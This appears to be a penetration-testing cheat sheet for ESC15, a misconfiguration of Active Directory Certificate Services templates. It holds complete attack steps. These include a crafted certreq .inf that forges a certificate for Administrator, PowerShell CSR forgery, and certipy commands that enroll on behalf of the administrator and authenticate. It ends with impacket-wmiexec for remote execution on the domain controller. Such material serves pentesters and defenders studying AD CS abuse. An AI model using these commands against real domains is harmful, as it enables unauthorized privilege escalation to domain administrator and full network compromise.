ESC15
Unlike ESC1, ESC15 occurs when a certificate template:
- Allows low-privileged user enrollment.
- Allows arbitrary SAN specification.
- Uses Schema Version 1.
-
Does not include the Client Authentication EKU, e.g.:
Client Authentication : False
This enables abuse through the Certificate Request Agent EKU, allowing certificate requests on behalf of other users, bypassing the Client Authentication requirement.
Windows
Use certreq
with a .inf
config file
You can manually craft a CSR with a malicious Application Policies extension.
Create .inf
file
[Version]
Signature="$Windows NT$"
[NewRequest]
Subject = "CN=Administrator"
KeyLength = 2048
Exportable = TRUE
KeySpec = 1
KeyUsage = 0xA0
MachineKeySet = FALSE
ProviderName = "Microsoft RSA SChannel Cryptographic Provider"
HashAlgorithm = sha256
RequestType = PKCS10
SMIME = FALSE
[Extensions]
2.5.29.17 = "{text}"
_continue_ = "upn=Administrator@minions.com"
1.3.6.1.4.1.311.21.10 = "{text}"
_continue_ = "1.3.6.1.5.5.7.3.2" ; ← This is Client Authentication OID
Generate request
certreq -new esc15.inf esc15.req
Submit request
certreq -submit -config "<CAHostname>\<CAName>" esc15.req esc15.cer
Convert to PFX
certreq -accept esc15.cer
# OR manually export it to a .pfx file
Now you can use the certificate with Rubeus
or certipy
.
Use PSCertificateEnrollment
(PowerShell Module)
This is a more modern and programmable way to generate a forged CSR.
Import-Module PSCertificateEnrollment
$Csr = New-CertificateRequest -Upn "Administrator@minions.com" -ApplicationPolicy ClientAuthentication
$Csr | Get-IssuedCertificate -ConfigString "minions-CA\minions-DC" -CertificateTemplate "WebServer"
This produces and submits a CSR that includes the malicious Application Policies extension.
Linux
Requesting a certificate with Application Policy EKU
Using friendly name
bob$ certipy req -u 'user1@minions.com' -p 'password1' -dc-ip <dc_ip> -ca <ca_name> -template <template_name> -target <target_ip> -application-policies 'Certificate Request Agent'
Using OID
bob$ certipy req -u 'user1@minions.com' -p 'password1' -dc-ip <dc_ip> -ca <ca_name> -template <template_name> -target <target_ip> --application-policies '1.3.6.1.5.5.7.3.2'
Requesting a certificate on behalf of the Administrator account
bob$ certipy req -u 'user1@minions.com' -p 'password1' -dc-ip <dc_ip> -ca <ca_name> -template <template_name> -target <target_ip> -on-behalf-of 'minions\administrator' -pfx user1.pfx
Authenticating with the obtained certificate
bob$ certipy auth -pfx administrator.pfx -username administrator -domain minions.com -dc-ip <dc_ip>
Verifying ticket functionality
bob$ KRB5CCNAME=<ccache_file> impacket-wmiexec -k -no-pass <dc_fqdn>